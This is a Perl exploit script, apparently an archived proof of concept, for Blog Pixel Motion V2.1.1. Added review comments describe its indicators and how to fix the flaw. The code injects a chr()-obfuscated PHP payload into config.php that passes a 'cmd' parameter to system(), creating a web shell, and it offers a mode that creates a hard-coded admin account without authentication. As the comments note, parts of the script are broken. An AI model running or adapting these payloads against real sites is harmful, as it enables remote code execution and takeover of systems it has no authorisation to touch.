
Blog Pixel Motion V2.1.1 PHP Code Execution / Create Admin Exploit






#!/usr/bin/perl=0D
#=0D
# Affected.scr..: Blog Pixel Motion V2.1.1=0D
# Poc.ID........: 12060927=0D
# Type..........: PHP Code Execution (stripslashes), SQL Injection (urldecode)=0D
# Risk.level....: High=0D
# Vendor.Status.: Unpatched=0D
# Src.download..: www.pixelmotion.org/zip/blog2.1.zip=0D 
# Poc.link......: acid-root.new.fr/poc/12060927.txt=0D
# Credits.......: DarkFig=0D
#=0D
# print "This exploit is for educational purpose only" x 999; exit;=0D
#=0D
#
# NOTE(review): every line below ends in "=0D", the quoted-printable form of
# a carriage return left over from the archive's transport encoding.  It is
# not Perl, and as displayed the text would not run as intended; treat this
# listing as historical proof-of-concept text, not a working script.
#
# Defender's reading of the PoC (every indicator below is taken from the
# code as written):
#   - mode 1 POSTs a chr()-encoded PHP fragment in the 'nom_blog' field of
#     config.php, then sends GET include/variables.php?cmd=<command> in a
#     loop and prints the response body;
#   - mode 2 (the default) sends a single GET to insere_base.php with a fixed
#     login/pass pair and reports it as a newly created admin account;
#   - every request carries the User-Agent string '0xzilla'.
# Detection points are therefore: POSTs to config.php and GETs to
# insere_base.php or include/variables.php?cmd= from non-admin sources, and
# a blog-name setting that contains PHP.  The remediation is on the
# application side: require authentication on those endpoints, never write
# request data into executable PHP, and parameterise the SQL.
#
use LWP::UserAgent;=0D
use HTTP::Request::Common;=0D
use HTTP::Response;=0D
use Getopt::Long;=0D
use strict;=0D
=0D
# Banner.
print STDOUT "\n+", '-' x 60, "+\n";=0D
print STDOUT "| Blog Pixel Motion V2.1.1 PHP Code Execution / Create Admin |\n";=0D
print STDOUT '+', '-' x 60, "+\n";=0D
=0D
# Command-line state.  $opt receives GetOptions' success flag but is never
# checked, so unknown options only produce Getopt::Long's own warning.
my($host,$path,$proxh,$proxu,$proxp,$choice,$cmd,$res);=0D
my $opt = GetOptions(=0D
   'host=s'   =>  \$host,=0D
   'path=s'   =>  \$path,=0D
   'proxh=s'  =>  \$proxh,=0D
   'proxu=s'  =>  \$proxu,=0D
   'proxp=s'  =>  \$proxp,=0D
   'choice=s' =>  \$choice);=0D
=0D
# --host is the only mandatory option; without it print usage and exit.
if(!$host) {=0D
    print STDOUT "|      Usage: ./zz.pl --host=[www] --path=[/] --choice=[0]   |\n";=0D
    print STDOUT "|   [Choice.]  1=PHP_Code_Execution       2=Create_Admin     |\n";=0D
    print STDOUT "|   [Options] --proxh=[ip] --proxu=[user] --proxp=[pwd]      |\n";=0D
    print STDOUT '+', '-' x 60, "+\a\n";=0D
    exit(1);=0D
}=0D
=0D
# Normalise inputs.  The /http/ test is unanchored, so it matches "http"
# anywhere in the value, not just a leading scheme.
if($host !~ /http/) {$host = 'http://'.$host;}=0D 
# NOTE(review): '!=' is a numeric comparison; a non-numeric proxy host and
# the empty string both numify to 0, so this branch is effectively never
# taken (and $proxh is read here even when --proxh was not supplied).
if($proxh !~ /http/ && $proxh != '') {$proxh = 'http://'.$proxh.'/';}=0D 
if(!$path) {$path = '/';}=0D
if(!$choice) {$choice = 2;}=0D
=0D
# HTTP client.  The fixed agent string '0xzilla' is a log indicator.
my $ua = LWP::UserAgent->new();=0D
   $ua->agent('0xzilla');=0D
   $ua->timeout(30);=0D
   $ua->proxy(['http'] => $proxh) if $proxh;=0D
# NOTE(review): this declares $re as undef and immediately calls a method on
# it; with --proxp given it dies at runtime, since no request exists yet.
my $re->proxy_authorization_basic($proxu, $proxp) if $proxp;=0D
=0D
# Mode 1: PHP code execution.
if($choice == 1) {=0D
=0D
   # The 'nom_blog' value is ONE Perl single-quoted string running from the
   # line below to the "//'" on the closing line; the "$shcode .= chr(...)"
   # lines are PHP text inside that string, not Perl statements.  The chr()
   # bytes spell a PHP snippet that passes $_GET['cmd'] to system(); the
   # leading '";' and trailing '//' presumably close and comment out the
   # config.php assignment the application writes (the header attributes the
   # flaw to stripslashes) -- verify against the vulnerable source.
   $re = POST $host.$path.'config.php', [=0D
   'nom_blog'  => '";=0D
    $shcode  = chr(0x69).chr(0x66).chr(0x28).chr(0x69).chr(0x73).chr(0x73).chr(0x65);=0D
    $shcode .= chr(0x74).chr(0x28).chr(0x24).chr(0x5F).chr(0x47).chr(0x45).chr(0x54);=0D
    $shcode .= chr(0x5B).chr(0x27).chr(0x63).chr(0x6D).chr(0x64).chr(0x27).chr(0x5D);=0D
    $shcode .= chr(0x29).chr(0x29).chr(0x7B).chr(0x73).chr(0x79).chr(0x73).chr(0x74);=0D
    $shcode .= chr(0x65).chr(0x6D).chr(0x28).chr(0x73).chr(0x74).chr(0x72).chr(0x69);=0D
    $shcode .= chr(0x70).chr(0x73).chr(0x6C).chr(0x61).chr(0x73).chr(0x68).chr(0x65);=0D
    $shcode .= chr(0x73).chr(0x28).chr(0x24).chr(0x5F).chr(0x47).chr(0x45).chr(0x54);=0D
    $shcode .= chr(0x5B).chr(0x27).chr(0x63).chr(0x6D).chr(0x64).chr(0x27).chr(0x5D);=0D
    $shcode .= chr(0x29).chr(0x29).chr(0x3B).chr(0x7D).chr(0x0D).chr(0x0A);=0D
    eval($shcode); die(); //'];=0D
    # The POST response is discarded; success is never checked.
    $ua->request($re);=0D
=0D
    # Command loop.  NOTE(review): "while()" with no condition loops forever
    # and nothing here reads from STDIN, so $_ (and thus $cmd) is never set
    # by this loop as written.  Each pass GETs include/variables.php with
    # $cmd placed in the URL unencoded and prints the response body.
    while(){=0D
    chomp($cmd = $_);=0D
    if($cmd eq 'exit') { exit(0); }=0D
    $re = GET $host.$path.'include/variables.php?cmd='.$cmd;=0D
    $res = $ua->request($re);=0D
    print STDOUT "\n\n".$res->content."\n\$sh: ";=0D
    }=0D
=0D
=0D
# Mode 2 (default, see the $choice fallback above): one unauthenticated GET
# to insere_base.php with fixed credentials; the response is not checked and
# the account is reported as created regardless of what the server returned.
} else {=0D
=0D
  $re = GET $host.$path.'insere_base.php?login=woot&pass=t00w';=0D
  $ua->request($re);=0D
  print STDOUT "[+] Admin login.: woot\n";=0D
  print STDOUT "[+] Admin passwd: t00w\n";=0D
  print STDOUT '+', '-' x 60, "+\n";=0D
=0D
}

